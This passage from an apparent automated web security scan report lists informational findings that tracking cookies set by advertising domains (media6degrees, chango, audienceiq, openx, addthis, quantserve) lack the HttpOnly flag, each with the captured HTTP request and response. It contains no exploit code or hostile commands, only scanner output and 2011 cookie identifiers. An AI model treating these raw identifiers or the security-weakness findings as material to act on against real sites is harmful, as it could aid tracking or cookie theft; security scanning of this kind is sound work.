GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishtimes.com%2fnewspaper%2ftheticket%2f2011%2f0506%2f1224296203710.html HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh13zye00y3l010k0150k; rdrlst=41c157rlklhm4000000053l0115sklkkpqq0000000d3l010m7alkkxrb0000000a3l010x1blkkpqq0000000d3l010hsplkkpqq0000000d3l010m7flkkyyl000000083l0112gdlkkyy0000000093l010morlkkxrb0000000a3l011196lkkkbe0000000j3l011195lkkpqh0000000e3l011194lkkjj40000000k3l010dlxlkb5u20000000o3l010znmlk34620000000t3l011193lkkplo0000000g3l01008slklhm4000000053l010p46lkkpqq0000000d3l011192lkkpke0000000i3l0110tylkkpku0000000h3l010p1blkb5u20000000o3l010moylkl0r5000000063l0100bvlk9pe80000000p3l0115xylk60qe0000000s3l0110poljyxb40000000v3l010e6llkl0r5000000063l0110telkd7nq0000000n3l010c9slk9pe80000000p3l0110rdlkdkly0000000l3l010mj2lkkxrb0000000a3l01159olk8fax0000000q3l010kualkkpqq0000000d3l010m0ulkl0r5000000063l010m45lkl0r5000000063l010m0plkkxrb0000000a3l010m40lkkxrb0000000a3l010mjelkkxrb0000000a3l0112qnlkkplt0000000f3l01167blkl0r5000000063l010bo8lkb5u20000000o3l010mjjlkl0r5000000063l011672lkkxrb0000000a3l010lw5lkb5u20000000o3l010ycrlkncow000000043l011203lkb5u20000000o3l01137rlkkpqq0000000d3l011204lkkyy0000000093l010o0vlkkpqx0000000c3l010z2ilkkxrb0000000a3l010ni1lkb5u20000000o3l01; sglst=20q0sc80lkb5u209jqc0063e000j00500ag2lkd7nq0kdwd00n3l010k0150kc81lkkpke0000000i3l010k0150ia6slkkpke0000000i3l010k0150i9rslkkpke00s1q00i3l010k0150iam5lkkxr8002zw00b3l010k0150b0kllklhm4000000053l010k015059q5lkb5u20abs200o3l010k0150kdgflkkpke00s1q00i3l010k0150i0t7ljyxb40yo8z00v3l010k0150kbo0lkb5u209jqc00o3l010k0150kbo1lkkyy000io40093l010k01509aoplkb5u209jqc0063e000j00500d86lklhm4000000053l010k01505942lkb5u20abs200o3l010k0150k8ndlkb5u20abs200o3l010k0150k719lkb5u209jqc0063e000j0050071alkkpke00s1q00i3l010k0150i56blkb5u20abs200o3l010k0150kasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000033l010k015034wclkb5u209jqc0063e000j005008eklkkpke00s1q00i3l010k0150i5mrlkb5u20abs200o3l010k0150kbwjlkkyy000io40093l010k01509; vstcnt=417k010r134exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt11407xxzt1tr37xzt1tr37xzt11407xxzt113zye; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh1407x00z3l020k0250l; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=41w157rlklhm4000000063l02157olkxltm000000013l0115holkxltm000000013l0115sklkkpqq0000000e3l020m7alkkxrb0000000b3l020x1blkkpqq0000000e3l020hsplkkpqq0000000e3l020m7flkkyyl000000093l0212gdlkkyy00000000a3l02148ilkxltm000000013l010morlkkxrb0000000b3l0214k6lkxltm000000013l0114rwlkxltm000000013l011196lkkkbe0000000k3l0214khlkxltm000000013l011195lkkpqh0000000f3l021194lkkjj40000000l3l020dlxlkb5u20000000p3l0216nulkxltm000000013l0114hplkxltm000000013l010znmlk34620000000u3l0214hclkxltm000000013l011193lkkplo0000000h3l021192lkkpke0000000j3l020p46lkkpqq0000000e3l02008slklhm4000000063l0216oilkxltm000000013l010moylkl0r5000000073l020p1blkb5u20000000p3l0210tylkkpku0000000i3l0200bvlk9pe80000000q3l0215xylk60qe0000000t3l0210poljyxb40000000w3l020e6llkl0r5000000073l0210telkd7nq0000000o3l020c9slk9pe80000000q3l0210rdlkdkly0000000m3l020mj2lkkxrb0000000b3l0214qllkxltm000000013l01159olk8fax0000000r3l0215halkxltm000000013l010kualkkpqq0000000e3l02163plkxltm000000013l010m0ulkl0r5000000073l020m45lkl0r5000000073l020m0plkkxrb0000000b3l020m40lkkxrb0000000b3l020mjelkkxrb0000000b3l0214xnlkxltm000000013l0112qnlkkplt0000000g3l02167blkl0r5000000073l020bo8lkb5u20000000p3l020mjjlkl0r5000000073l021672lkkxrb0000000b3l020lw5lkb5u20000000p3l020ycrlkncow000000053l0215k9lkxltm000000013l0116atlkxltm000000013l011203lkb5u20000000p3l02163clkxltm000000013l01137rlkkpqq0000000e3l021204lkkyy00000000a3l020o0vlkkpqx0000000d3l0214ozlkxltm000000013l0114j7lkxltm000000013l0114bzlkxltm000000013l010z2ilkkxrb0000000b3l020ni1lkb5u20000000p3l02; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxltm000000013l010k01501dsnlkxltm000000013l010k01501arllkxltm000000013l010k01501cg5lkxltm000000013l010k015019rslkkpke0cw9800j3l020k0250jam5lkkxr8002zw00c3l020k0250ccd4lkxltm000000013l010k01501crglkxltm000000013l010k01501cnolkxltm000000013l010k01501abelkxltm000000013l010k01501dd8lkxltm000000013l010k01501cy2lkxltm000000013l010k01501aoplkb5u209jqc0063e000j00500cnxlkxltm000000013l010k01501bq3lkxltm000000013l010k01501aoilkxltm000000013l010k01501bvplkxltm000000013l010k01501942lkb5u20mfzk00o3l000k005009ullkxltm000000013l010k015018ndlkb5u20mfzk00o3l000k00500bvclkxltm000000013l010k01501c5flkxltm000000013l010k0150156blkb5u20mfzk00o3l000k00500bjqlkxltm000000013l010k01501awklkxltm000000013l010k01501asulkb5u209jqc0063e000j00500crplkxltm000000013l010k01501asqlkxltm000000013l010k01501c5rlkov6e000000043l020k02504aw8lkxltm000000013l010k01501c60lkxltm000000013l010k01501dc4lkxltm000000013l010k01501d26lkxltm000000013l010k01501dnjlkxltm000000013l010k01501brilkxltm000000013l010k01501cbclkxltm000000013l010k01501c85lkxltm000000013l010k01501csslkxltm000000013l010k01501c80lkb5u209jqc0063e000j00500ag2lkd7nq0ke5w00o3l020k0250lc1elkxltm000000013l010k01501c81lkkpke0cw9800i3l000k005009grlkxltm000000013l010k01501c8flkxltm000000013l010k01501a6slkkpke0cw9800i3l000k00500dnalkxltm000000013l010k015019z6lkxltm000000013l010k01501dbtlkxltm000000013l010k015019q4lkxltm000000013l010k015010kllklhm40c47i0053l000k00500dyllkxltm000000013l010k01501b3zlkxltm000000013l010k015019q5lkb5u20mfzk00o3l000k005009mjlkxltm000000013l010k01501dgflkkpke0cw9800j3l020k0250j0t7ljyxb40yoii00w3l020k0250lbo0lkb5u20mfzk00p3l020k0250lbo1lkkyy00cmvm0093l000k005009pglkxltm000000013l010k01501d86lklhm40c47i0053l000k00500cwalkxltm000000013l010k01501dqllkxltm000000013l010k01501d84lkxltm000000013l010k01501dz3lkxltm000000013l010k01501cm6lkxltm000000013l010k01501cxdlkxltm000000013l010k01501719lkb5u20mfzk0073l010k0150271alkkpke0cw9800i3l000k00500ctplkxltm000000013l010k01501cc3lkxltm000000013l010k01501dgilkb5u209jqc0063e000j00500cthlkxltm000000013l010k015014wclkb5u20mfzk0073l010k01502a0ulkxltm000000013l010k015015mrlkb5u20mfzk00o3l000k005008eklkkpke0cw9800i3l000k00500arilkxltm000000013l010k01501cbplkxltm000000013l010k01501bwjlkkyy00cmvm00a3l020k0250a9gelkxltm000000013l010k01501; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: vstcnt=417k010r144exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1287355&id=1287330&id=1280693&id=1277220&id=1277245&id=1266387&id=1265430&id=1265419&id=1264304&id=1261148&id=1259050&id=1259015&id=1258217&id=1256870&id=1256778&id=1256768&id=1256837&id=1256878&id=1255378&id=1256592
Content-Length: 0
Date: Mon, 09 May 2011 14:05:46 GMT

10.48. http://cw-m.d.chango.com/m/cw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cw-m.d.chango.com
Path:   /m/cw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_cw=1; _i_admeld=1; _i_ox=1; _i_st=1; _i_pm=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-06-23
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Thu, 06 May 2021 14:00:03 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 23 Jun 2011 14:00:03 GMT; Path=/
Connection: close

10.49. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:04 GMT

GIF89a.............!.......,...........D..;
10.50. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:06 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;
10.51. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2417656649724524407

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2417656649724524407; Domain=.mediabrandsww.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;
10.52. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3706692347515356359

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3706692347515356359; Domain=.p-td.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;
10.53. http://d.tradex.openx.com/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?zoneid=2650&cb=25141706899&charset=ISO-8859-1&loc=http%3A//www.surphace.com/ads/rubicon_orlandosentinel&referer=http%3A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b; expires=Tue, 08-May-2012 14:00:00 GMT; path=/
Content-Length: 3804
Connection: close
Content-Type: text/javascript; charset=ISO-8859-1

var OX_70f8dde7 = '';
OX_70f8dde7 += "<"+"script type=\"text/javascript\">\n";
OX_70f8dde7 += "OXM_ad = {\"website\":\"dd81ea27-d6ee-482c-a1ae-66747444994b\",\n";
OX_70f8dde7 += "\"size\":\"468x60\",\
...[SNIP]...
10.54. http://d.tradex.openx.com/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=4945&campaignid=1660&zoneid=2650&loc=1&referer=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel&cb=81ae8f794a&r_id=02eea6ce6a94fccf845961f4c7a8855c&r_ts=lkxlk0 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b; expires=Tue, 08-May-2012 14:00:04 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
10.55. http://data.adsrvr.org/map/cookie/contextweb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/contextweb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /map/cookie/contextweb HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967
Pragma: no-cache
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 09-May-2012 14:00:08 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF; path=/
Content-Length: 213

Redirecting to: <a href="http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967">http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988
...[SNIP]...
10.56. http://data.cmcore.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?tid=17&ci=90074784&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=300x250&cm_mmca2=300x250_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=25K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:27 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90074784_login=1304949627001684455490074784; path=/
Set-Cookie: 90074784_reset=1304949627;path=/
Expires: Sun, 08 May 2011 20:00:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
10.57. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 456
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:32 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949872.1FE|1304949872.1OD|1304949872.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:32 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degree
...[SNIP]...
10.58. http://edge.quantserve.com/quant.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: edge.quantserve.com

Response

HTTP/1.1 200 OK
Connection: close
ETag: "20606:E0-713827831-1304949969580"
Vary: Accept-Encoding
Last-Modified: Mon, 09-May-2011 14:06:09 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4dc7f4d1-8dd66-3f1ef-84d25; expires=Mon, 09-May-2021 14:06:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 14:06:09 GMT
Date: Mon, 09 May 2011 14:06:09 GMT
Server: QS
Content-Length: 5265

